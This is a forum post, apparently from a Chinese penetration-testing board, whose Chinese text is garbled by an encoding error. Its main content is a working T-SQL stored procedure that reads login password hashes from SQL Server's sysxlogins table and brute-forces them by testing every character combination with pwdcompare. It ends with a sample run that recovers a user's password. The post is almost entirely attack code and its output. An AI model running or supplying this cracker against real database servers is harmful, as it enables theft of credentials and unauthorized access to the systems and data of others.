ÂÛ̳ › ÍøÂçÉø͸²âÊÔ::¡ºNetwork penetration testing¡» › ÆƽâMSSQLµÄSAÃÜÂë

admin ·¢±íÓÚ 2013-2-27 21:32:55

ÆƽâMSSQLµÄSAÃÜÂë

alter
proc p_GetPassword2
    @username sysname=null, --Óû§Ãû,Èç¹û²»Ö¸¶¨,ÔòÁгöËùÓÐÓû§

@pwdlen
int=2
--ÒªÆƽâµÄÃÜÂëµÄλÊý,ĬÈÏÊÇ2λ¼°ÒÔϵÄ
as
    set nocount on

    if
object_id(N'tempdb..#t') is
not
null
      drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
      drop
table #pwd

    set
@pwdlen=case
when
isnull(@pwdlen,0)<1
then
1
else
@pwdlen-1
end

    declare
@ss
varchar(256)
    --select @ss= '123456789'

select
@ss=
'abcdefghijklmnopqrstuvwxyz'
    select
@ss=@ss+
'`0123456789-=[]\;,./'
    select
@ss=@ss+
'~!@#$%^&*()_+{}|:<>?'
    --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

    create
table #t(c char(1) not
null)
    alter
table #t add
constraint PK_#t primary
key
CLUSTERED (c)
    declare
@index
int
    select
@index=1
    while (@index
<=len(@ss))
    begin
      insert #t select
SUBSTRING(@ss, @index, 1)
      select
@index
=
@index
+1
    end

    select name,password
      ,type=case
when xstatus&2048=2048
then
1
else
0
end
      ,jm=case
when password is
null
then
1
else
0
end
      ,pwdstr=cast(''
as sysname)
      ,pwd=cast(''
as
varchar(8000))
      ,times =cast(''
as
varchar(8000))
      into #pwd
    from master.dbo.sysxlogins a
    where srvid is
null
      and name=isnull(@username,name)
    declare
@s1
varchar(8000),@s2
varchar(8000),@s3
varchar(8000), @stimes
varchar(8000)

    declare
@l
int, @t
bigint

    select
@t
=
count(1)*POWER(len(@ss),1) from #pwd

    select
@l=0
      ,@s1='aa.c'
      ,@s2='cast(ASCII(aa.c) as varchar)'
      ,@s3=',#t aa'
      ,@stimes='1th,'
+
cast(@t
as
varchar(20)) +
'rows'

    exec('
      update pwd set jm=1,pwdstr='+@s1+'
      ,pwd='+@s2+'
      from #pwd pwd'+@s3+'
      where pwd.jm=0
      and pwdcompare('+@s1+',pwd.password,pwd.type)=1
      ')
    while
exists(select
1
from #pwd where jm=0
and
@l<@pwdlen)
    begin
      select
@l=@l+1
      select
@t
=
count(1)*POWER(len(@ss),@l+1) from #pwd
      print
@t

      select
      @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
      ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
      ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
      ,@stimes=@stimes+';'+
cast(@l+1
as
varchar(1)) +
'th,'
+
cast(@t
as
varchar(20)) +
'rows'

      exec('
      update pwd set jm=1,pwdstr='+@s1+'
      ,pwd='+@s2+'
      ,times='''+@stimes+'''
      from #pwd pwd'+@s3+'
      where pwd.jm=0
      and pwdcompare('+@s1+',pwd.password,pwd.type)=1
      ')
    end
    select Óû§Ãû=name,ÃÜÂë=pwdstr,ÃÜÂëASCII=pwd, ²éѯ´ÎÊýºÍÐÐÊý=times
    from #pwd

    if
object_id(N'tempdb..#t') is
not
null
      drop
table #t
    if
object_id(N'tempdb..#pwd') is
not
null
      drop
table #pwd
ÎÒ²âÊÔÈçÏÂ
p_GetPassword2 'b', 6
Óû§Ãû      ÃÜÂë      ÃÜÂëASCII      ²éѯ´ÎÊýºÍÐÐÊý
b      123      49,50,51      1th,66rows;2th,4356rows;3th,287496rows

²é¿´ÍêÕû°æ±¾: ÆƽâMSSQLµÄSAÃÜÂë